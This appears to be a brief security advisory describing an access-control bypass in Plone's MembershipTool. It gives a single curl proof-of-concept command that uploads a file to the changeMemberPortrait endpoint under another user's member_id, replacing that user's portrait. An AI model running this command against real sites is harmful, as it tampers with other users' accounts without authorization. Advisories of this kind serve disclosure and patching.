Plone MembershipTool Access Control Bypass Vulnerability

Plone MembershipTool Access Control Bypass Vulnerability

Attackers may use standard web client applications to exploit this issue.

The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:

curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait